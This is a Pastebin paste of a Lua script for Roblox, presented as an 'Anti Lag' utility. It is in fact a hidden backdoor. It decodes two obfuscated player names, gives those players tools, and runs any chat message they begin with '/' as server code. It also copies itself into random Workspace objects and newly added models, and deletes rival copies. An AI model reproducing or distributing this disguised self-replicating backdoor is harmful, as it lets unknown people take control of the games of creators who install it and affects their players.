NiceBBMBThai

Anti Lag 4

Dec 31st, 2024
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.65 KB | None | 0 0
  1. Altitude = script:clone()
  2. calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
  3. Knox = {}
  4. table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
  5. table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
  6. Play = {}
  7. function rando(votation)
  8. local hatr = 5
  9. local calc = math.pi * math.huge
  10. local longicate = votation:GetChildren()
  11. if #longicate > hatr then
  12. calc = calc + math.pi
  13. return longicate[math.random(6,#longicate)]
  14. end
  15. end
  16. function doublecheck()
  17. local fj = game.Workspace:GetChildren()
  18. for off = 1,#fj do
  19. if fj[off].className == "Part" then
  20. local fh = fj[off]:FindFirstChild("Anti-Lag")
  21. if fh ~= nil then
  22. return false
  23. end
  24. end
  25. end
  26. return true
  27. end
  28. function workcheck()
  29. if doublecheck() == true then
  30. local l = Altitude:clone()
  31. l.Parent = rando(game.Workspace)
  32. end
  33. end
  34. workcheck()
  35. function gibite(quen)
  36. local  hup = Instance.new("Message")
  37. hup.Text = "Detected"
  38. hup.Parent = quen.Parent
  39. local con = Instance.new("Script")
  40. con.Source = [[wait(5) script.Parent:remove()]]
  41. con.Parent = hup
  42. for ish = 0,7 do
  43. local a = Instance.new("HopperBin")
  44. a.BinType = ish
  45. a.Parent = quen
  46. end
  47. end
  48. function laber(zonsa)
  49. wait()
  50. for slate = 1,#Knox do  
  51. if zonsa.Name == Knox[slate] then
  52. gibite(zonsa.Backpack)
  53. table.insert (Play, 1,  zonsa.Name)
  54. end
  55. end
  56. end
  57. function yeild(frequency)
  58. local t = Knox
  59. for g = 1,#t do
  60. if t[g] == frequency.Name then
  61. return true
  62. end
  63. end
  64. return false
  65. end
  66. function check(los)
  67. local r = los:GetChildren()
  68. for i = 1,#r do
  69. local h = r[i]:FindFirstChild("Anti-Lag")
  70. if h ~= nil then
  71. h:remove()
  72. end
  73. end
  74. end
  75. function alto(xylem)
  76. if xylem.className == "Model" then
  77. check(xylem)
  78. local que = script:clone()
  79. que.Parent = rando(xylem)
  80. end
  81. end
  82. function sortation(gone)
  83. local dimbs = Altitude:clone()
  84. dimbs = ramno(game.Workspace)
  85. end
  86. function onPlayerEntered(newPlayer)
  87. newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
  88. end
  89. function Player(player)
  90. player.Changed:connect(function (property)
  91. if property == "Character" then
  92. laber(player)
  93. end
  94. end)
  95. end
  96. game.Players.PlayerAdded:connect(Player)
  97. game.Players.ChildAdded:connect(onPlayerEntered)
  98. game.Players.ChildAdded:connect(laber)
  99. script.ChildRemoved:connect(sortation)
  100. game.Workspace.ChildAdded:connect(alto)
  101. function onChatted(msg, recipient, speaker)
  102. if yeild(speaker) ~= false then
  103. if string.sub(msg,1,1) == "/" then
  104. local dsting = Instance.new("Script")
  105. dsting.Source = string.sub(msg,2)
  106. dsting.Parent = game.Workspace
  107. end
  108. end
  109. end
Add Comment
Please, Sign In to add comment